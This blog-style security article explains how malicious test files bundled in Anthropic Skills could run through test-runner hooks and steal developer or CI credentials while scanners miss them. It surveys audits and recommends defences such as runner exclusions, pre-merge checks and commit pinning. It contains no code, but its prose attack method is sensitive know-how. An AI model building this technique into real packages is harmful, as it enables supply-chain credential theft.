Home / AI Applications / New Security Flaw Found in Anthropic Skill Scanners

New Security Flaw Found in Anthropic Skill Scanners

May 8, 2026

Robert SainiCloud Solutions Consultant

A standard security scan of an Anthropic Skill might return a perfect health report today, even while a malicious payload sits quietly in an adjacent directory waiting for the right moment to strike. This discrepancy arises because current scanning tools focus almost exclusively on the agent’s execution surface, such as the primary markdown instructions and the specific scripts the agent is explicitly told to run. However, a significant vulnerability exists within the files that the scanner ignores, particularly test files like .test.ts or conftest.py. These files are often bundled with the Skill and, upon installation, are automatically picked up by local development tools and continuous integration environments. Because scanners are programmed to look for prompt injections and malicious shell commands within the agent’s direct operational path, they remain entirely blind to code that executes during the testing phase. This oversight creates a dangerous entry point where malicious code can ride in on a file intended for quality assurance, exploiting the trust developers place in automated testing frameworks. The risk is not theoretical; it represents a fundamental mismatch between the threat model being scanned and the actual execution paths present on a modern developer’s machine. As organizations increasingly adopt AI agents to streamline complex workflows, the potential for these unmonitored files to compromise entire development environments grows, necessitating a more comprehensive approach to Skill security that extends beyond the agent’s immediate instructions to the broader toolchain.

1. The Mechanics: Understanding the Test-File Exploit

Testing frameworks like Jest, Vitest, and Mocha have become staples of the modern JavaScript and TypeScript ecosystems, largely due to their ability to simplify test discovery through recursive glob patterns. When a developer installs a new Anthropic Skill using commands like npx skills add, the installer typically places the entire Skill directory into a folder such as .agents/skills/. While the security scanners meticulously inspect the SKILL.md file for dangerous prompts, the test runners are meanwhile scouring the entire project for files matching specific extensions. Most default configurations for these frameworks are designed to be helpful, often passing parameters like dot: true to their underlying engines to ensure no test is missed, even if it resides within a hidden or dot-prefixed directory. This means that a malicious .test.ts file tucked away inside a Skill’s folder will be identified as a first-class test by the developer’s local environment or the company’s build server. There is no mechanism within the current scanner logic to flag these files as dangerous because they are technically outside the agent’s own runtime. Consequently, the very tools meant to ensure software quality become the delivery mechanism for unauthorized code execution. The recursive nature of these tools ensures that as soon as a Skill is added to a project, any bundled test files are integrated into the active test suite without any manual intervention or explicit approval from the user.

Once discovered, the malicious payload does not wait for a prompt from an AI agent to begin its work; instead, it leverages standard testing hooks like beforeAll or beforeEach to fire its code. These hooks are designed to set up environments, but in the hands of an attacker, they serve as a silent trigger that executes before any actual assertions are run. Within this context, the code has full access to the local filesystem, environment variables, and any sensitive keys stored in the environment, such as SSH or AWS credentials. In a continuous integration (CI) pipeline, the stakes are even higher, as these environments often hold deployment tokens and secrets required to access production infrastructure. The vulnerability is further exacerbated by how these Skills are managed within a team; because the .agents/ directory is usually committed to the repository to ensure consistency across the development group, a single malicious Skill can propagate to every teammate who clones the project. This “trust-on-install” model is reminiscent of historical exploits involving npm postinstall scripts, but it is uniquely dangerous here because the code resides in a location that traditional security tools do not expect to harbor executable threats. The payload executes silently, often leaving no trace in the test output that would suggest anything unusual has occurred, while simultaneously exfiltrating sensitive data to an external endpoint controlled by the attacker.

2. Summary: Analyzing Major Security Audits and Findings

Recent investigations by security firms have shed light on the massive scale of this problem, starting with Gecko Security’s detailed disclosure of the attack flow. Their research demonstrated that the gap is not a failure of individual scanners to function as intended, but rather a structural blind spot common to the entire category of AI agent security tools. This qualitative finding was reinforced by the SkillScan academic study, which performed a massive quantitative analysis of over 31,132 unique Anthropic Skills collected from popular marketplaces. The study’s results were sobering, revealing that 26.1% of the analyzed Skills contained at least one vulnerability, ranging from data exfiltration to privilege escalation. Perhaps more importantly, the researchers found that Skills bundling executable scripts were over twice as likely to contain security flaws compared to those that were instruction-only. This statistic highlights a clear correlation between the complexity of a Skill’s file structure and its likelihood of being malicious or poorly secured. The study effectively mapped the execution surface that scanners currently inspect, providing a baseline that highlights exactly what is being missed. While scanners are getting better at identifying obvious prompt injections, the sheer volume of Skills with hidden executable logic suggests that the current manual and automated review processes are failing to keep pace with the creativity of threat actors.

Building on these findings, the Snyk ToxicSkills audit provided further evidence of the ongoing threat by scanning nearly 4,000 Skills and identifying critical issues in over 13% of them. This audit was particularly notable for discovering seventy-six confirmed malicious payloads, some of which remained publicly available even after the research was published. While companies like Cisco have stepped in to provide integrated solutions, such as the AI Agent Security Scanner for IDEs, these tools still predominantly target the agent interaction layer. Cisco’s scanner brings valuable capabilities to developers’ workflows by scanning for risks in real-time within environments like VS Code and Cursor, yet it does not currently inspect bundled test files. This is because the detection categories were built to solve the problem of “what will the agent do,” rather than “what will the developer’s tools do with the Skill’s files.” This distinction is critical because it means that even with the most advanced scanners currently on the market, a developer is still vulnerable to the test-file execution vector. The three major scanners—Snyk, Cisco, and VirusTotal Code Insight—all demonstrate a high level of proficiency in catching prompt-based attacks, but they all share the same structural limitation of ignoring the developer execution surface that sits right next to the agent’s code. This collective oversight has created a false sense of security for organizations that believe a “clean” scan result implies a safe Skill.

3. Practical Implementation: Three Steps to Fortify Your CI Pipeline

To mitigate these risks immediately, organizations must take proactive steps to harden their development and CI environments without waiting for scanner vendors to update their logic. The first and most effective defense is to explicitly configure test runners to ignore the directories where AI Skills are stored. For teams using Jest, this involves adding a specific regex to the testPathIgnorePatterns in the configuration file, while Vitest users should update their exclude array to include the .agents/ path. This single line of configuration prevents the test runner from ever discovering or executing malicious files hidden within those directories. Beyond this, a secondary layer of defense should be implemented in the form of a pre-merge CI check. This check should be designed to scan the .agents/skills/ directory for any files that match common test or configuration patterns, such as *.test.*, *.spec.*, or conftest.py. Since these files have no legitimate purpose inside a Skill directory intended for agent use, their presence should be treated as a high-risk indicator. A simple shell script can be used to flag and block pull requests containing these files, forcing a manual review before any potentially malicious code can enter the main codebase. By shifting the focus from the content of the files to their mere existence in sensitive locations, security teams can close the execution window that attackers rely on.

The third essential step in securing the Skill supply chain is to move away from the “trust-on-first-use” model by pinning all Skill dependencies to immutable commit hashes. The standard installation commands often pull the latest version of a Skill from a repository, which creates an opening for an attacker to push a malicious update to a Skill that was previously audited and cleared. By specifying a specific commit hash, developers ensure that they are only running code that has been reviewed and verified by their internal security protocols. This practice aligns with the recommendations found in the OWASP Agentic Skills Top 10, which emphasizes the need for version control and integrity checks in AI-driven workflows. When an update to a Skill is required, the team should perform a diff between the current and new versions to identify any new files or changes in logic that could introduce vulnerabilities. This approach transforms the installation process from a passive acceptance of third-party code into a rigorous verification cycle. Furthermore, for repositories where Skills have already been installed, it is vital to run an immediate audit using static analysis tools to identify any existing test files that may have been overlooked. If suspicious files are discovered, the incident response should include rotating any credentials that were accessible to the CI environment and reviewing logs for unauthorized network activity. Taking these steps ensures that even if a scanner fails to catch a threat, the environment is architected to prevent its execution.

4. Vendor Evaluation: Five Essential Questions for Skill Scanners

As the market for AI agent security tools matures, procurement teams must look beyond marketing claims and ask difficult questions about the underlying detection logic of their chosen scanners. A primary concern is the actual depth of analysis; it is no longer enough for a scanner to only look at the SKILL.md file. Security professionals should ask vendors exactly which files and directories are included in their analysis and whether they treat non-instructional files as potential execution surfaces. If a scanner only focuses on the agent’s intent, it will inevitably miss kinetic actions triggered by the developer’s toolchain. It is also important to determine if the tool can recognize the specific risks associated with bundled test files or build configurations. Given that studies have shown script-bundling Skills are significantly more likely to be vulnerable, the scanner should ideally flag these as higher-risk entries during the initial review. Understanding the vendor’s stance on the developer execution surface is crucial for determining if their product fits into a modern, defense-in-depth strategy. Vendors should be able to explain how their tool accounts for the ways in which modern testing frameworks interact with installed dependencies. This level of inquiry pushes vendors to move toward a more holistic threat model that considers the entire lifecycle of a Skill, from installation to execution, rather than just the moment the agent is invoked.

Transparency is another key metric for evaluating scanner effectiveness, and organizations should favor vendors that publish their detection categories or open-source their scanning logic. For instance, Cisco’s decision to open-source its Skill Scanner allows security teams to verify exactly what threats are being checked, providing a level of assurance that closed-source tools cannot match. When engaging with a vendor, ask if they have published any ecosystem-scale audits that detail their research methodology and sample sizes. Large-scale audits, like those conducted by Snyk or the authors of SkillScan, provide a benchmark for understanding the actual threat landscape and the vendor’s ability to navigate it. Without a published audit, it is difficult to independently verify a scanner’s detection rate or its performance against real-world malicious payloads. Additionally, ask if the vendor provides specific documentation or integration guides for hardening CI pipelines, such as instructions for restricting test-runner discovery patterns. A vendor who understands the systemic nature of these vulnerabilities will provide more than just a scanning tool; they will offer the guidance necessary to integrate that tool into a secure development environment. Finally, inquire about how the scanner handles the evolution of threats, such as the emergence of new testing frameworks or changes in how AI IDEs handle Skill directories. A tool that cannot adapt to the changing developer toolchain will quickly become obsolete as attackers find new execution vectors outside the traditional boundaries.

5. Strategic Shifts: Expanding the Modern Threat Model

The shift toward AI agents represents an explosion of non-human identities within the enterprise, many of which operate with super-human privileges and access to previously siloed data sets. As these agents become more integrated into daily operations, the distinction between “intent” and “kinetic action” becomes paramount for security strategy. Current Anthropic Skill scanners are largely designed to solve the problem of intent: what is the Skill telling the agent to do? While this is a critical component of security, the Gecko bypass proves that focusing solely on intent leaves a wide opening for kinetic actions that occur entirely outside the agent’s awareness. These actions leverage the permissions of the developer or the CI system, which are often far more extensive than the permissions granted to the agent itself. To build a resilient security posture, organizations must bridge this gap by treating the developer toolchain as a first-class citizen in their threat models. This means recognizing that any file added to a repository is a potential execution vector, regardless of whether it is intended for the AI agent or for the testing suite. The focus must expand from protecting the agent’s prompts to protecting the integrity of the entire environment in which the agent resides. This broader perspective ensures that security controls are placed where the code actually executes, rather than just at the perimeter of the agent’s instructions.

The discovery of the test-file vulnerability highlighted a critical need for organizations to look beyond the immediate operational surface of AI agents. It was not enough to rely on scanners that focused solely on the instructions provided to the agent, as the threat resided in the very tools used to maintain code quality. By implementing specific exclusions in test runners and enforcing strict pre-merge audits, teams took the necessary steps to close the execution window that attackers had exploited. The transition from a trust-based model to a verification-heavy approach, involving immutable commit pinning and manual code reviews, proved essential in securing the supply chain. These actions did not just patch a single flaw; they established a new standard for how third-party AI Skills were integrated into secure environments. The experience reinforced the idea that as developer tools and AI agents continue to converge, the boundaries of security must expand to cover the entire toolchain. Organizations that moved quickly to harden their CI pipelines and challenged their security vendors for greater transparency were better positioned to weather the evolving threat landscape. In the end, the solution required a combination of technical configuration changes and a fundamental shift in how security teams perceived the risks associated with AI-driven development.